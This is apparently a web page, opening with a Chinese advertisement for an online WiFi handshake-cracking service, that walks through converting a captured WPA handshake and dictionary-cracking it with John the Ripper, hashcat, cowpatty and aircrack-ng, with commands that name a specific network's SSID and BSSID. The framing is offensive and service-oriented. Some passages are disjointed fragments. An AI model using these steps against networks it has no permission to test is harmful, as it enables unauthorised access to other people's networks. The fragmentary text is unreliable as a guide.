
在线wifi跑包 金刚包跑包 cap跑包 hccapx ewsa在线 就来 握手包跑包

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hcxpcaptool -j 11.john 11.cap

John@ john the ripper is a fast password cracking tool used to attempt to crack plaintext passwords from known ciphertext. It supports most encryption algorithms such as DES, MD4, MD5, etc. It is compatible with various system architectures including Unix, Linux, Windows, DOS mode, BeOS, and OpenVMS, with the main purpose of cracking less secure Unix/Linux system passwords. First, the captured handshake packet is converted into John’s proprietary format.

john -w:/root/zidian/pass.txt --format=wpapsk  11.john
john --show 11.john
hcxpcaptool -o 22.hccapx hs/handshake_ChinaNetfDtL_80-C7-C5-34-29-9D_2019-03-14T21-51-35.cap

Here, 11.cap is the captured handshake packet. We load a dictionary for cracking. The path /root/zidian/pass.txt represents our dictionary path. As you can see, the password has been cracked. Alternatively, we can use the following command to view the current password: hashcat. Similarly, we need to convert the cap file into hashcat format first.

hashcat --quiet -m 2500 22.hccapx /root/zidian/pass.txt --force
cowpatty 4.8 - WPA-PSK dictionary attack. 
Usage: cowpatty [options]
    -f     Dictionary file
    -d     Hash file (genpmk)
    -r     Packet capture file
    -s     Network SSID (enclose in quotes if SSID includes spaces)
    -c     Check for valid 4-way frames, does not crack
    -h     Print this help information and exit
    -v     Print verbose information (more -v for more verbosity)
    -V     Print program version and exit

Perform dictionary-based cracking. If prompted as follows: it is usually due to the lack of GPU drivers in Kali running on a virtual machine. Hashcat supports using GPUs to improve cracking speed. Simply install the GPU drivers. If it still doesn’t work, you can install hashcat on Windows.

cowpatty -f 字典 -r 握手包.cap -s 无线网名称
aircrack-ng -a 2 -w 字典 --bssid 80:C7:C5:34:29:9D  握手包.cap

So the format is as follows: Example: aircrack. Help documentation: Summary. In conclusion, each software has its advantages and disadvantages. Taking hashcat as an example, it is the fastest cracking tool, but it requires GPU support. Without a good GPU, its effectiveness is limited.
